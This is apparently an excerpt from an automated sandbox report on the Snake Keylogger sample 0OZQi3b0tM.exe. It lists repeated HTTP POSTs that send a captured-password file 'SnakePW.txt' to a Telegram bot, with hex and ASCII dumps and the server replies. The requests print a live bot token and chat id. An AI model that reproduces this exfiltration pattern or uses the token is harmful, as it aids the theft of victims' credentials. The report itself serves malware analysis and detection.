                                                                    2022-06-26 07:32:56 UTC68INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 38 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 37 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66787,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228776,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    41192.168.2.549815149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:32:56 UTC69OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756df23493c
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:32:56 UTC69OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 64 66 32 33 34 39 33 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756df23493cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:32:56 UTC70INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:32:56 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:32:56 UTC70INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 38 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 37 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66788,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228776,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    42192.168.2.549816149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:32:56 UTC70OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756df57bcdb
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:32:56 UTC71OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 64 66 35 37 62 63 64 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756df57bcdbContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:32:57 UTC71INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:32:57 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:32:57 UTC72INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 38 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 37 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66789,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228777,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    43192.168.2.549817149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:32:57 UTC72OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756df95b910
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:32:57 UTC72OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 64 66 39 35 62 39 31 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756df95b910Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:32:57 UTC73INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:32:57 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:32:57 UTC73INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 39 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 37 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66790,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228777,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    44192.168.2.549818149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:32:57 UTC74OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756dfca2db5
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:32:57 UTC74OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 64 66 63 61 32 64 62 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756dfca2db5Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:32:58 UTC75INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:32:58 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:32:58 UTC75INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 39 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 37 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66792,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228777,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    45192.168.2.549821149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:32:58 UTC76OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756e00f5165
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:32:58 UTC76OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 30 30 66 35 31 36 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756e00f5165Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:32:58 UTC76INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:32:58 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:32:58 UTC77INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 39 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 37 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66793,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228778,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    46192.168.2.549822149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:32:58 UTC77OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756e04626c2
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:32:58 UTC78OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 30 34 36 32 36 63 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756e04626c2Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:32:58 UTC78INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:32:58 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:32:58 UTC78INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 39 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 37 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66794,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228778,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    47192.168.2.549824149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:32:58 UTC79OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756e081c1a8
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:32:58 UTC79OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 30 38 31 63 31 61 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756e081c1a8Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:32:59 UTC80INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:32:59 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
